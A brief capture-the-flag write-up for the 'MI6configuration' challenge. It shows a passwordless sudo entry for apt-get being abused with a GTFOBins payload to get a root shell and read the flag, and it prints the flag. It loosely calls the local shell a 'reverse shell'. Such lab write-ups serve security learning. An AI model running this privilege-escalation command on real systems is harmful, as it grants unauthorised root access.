Tags: root mj0ln1r invaders0x1 pentest 

Rating: 4.0

# MI6configuration

Checking for the commands which can be executed as sudo user by the `q`

q@MI6:/$ sudo -l
sudo -l
Matching Defaults entries for q on MI6:
env_reset, mail_badpass,

User q may run the following commands on MI6:
(ALL) NOPASSWD: /usr/bin/apt-get


`apt-get` can be executed by the `q` as the sudo user. So, searching for the apt-get privilege escalation payload results the following payload from `gtofbins`.

`sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh`

This payload will give the reverse shell with the `root` privileges.

q@MI6:/$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

cd /
cd root
cat flag.txt
cat: flag.txt: No such file or directory
cat flag4.txt
Good job Hacking!
Good luck on the other challenges!

Finally got the root shell and successfully catted out the root flag4.

> `Flag : byuctf{sudo_mi6configured}`

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)

Original writeup (https://themj0ln1r.github.io/posts/byuctf23).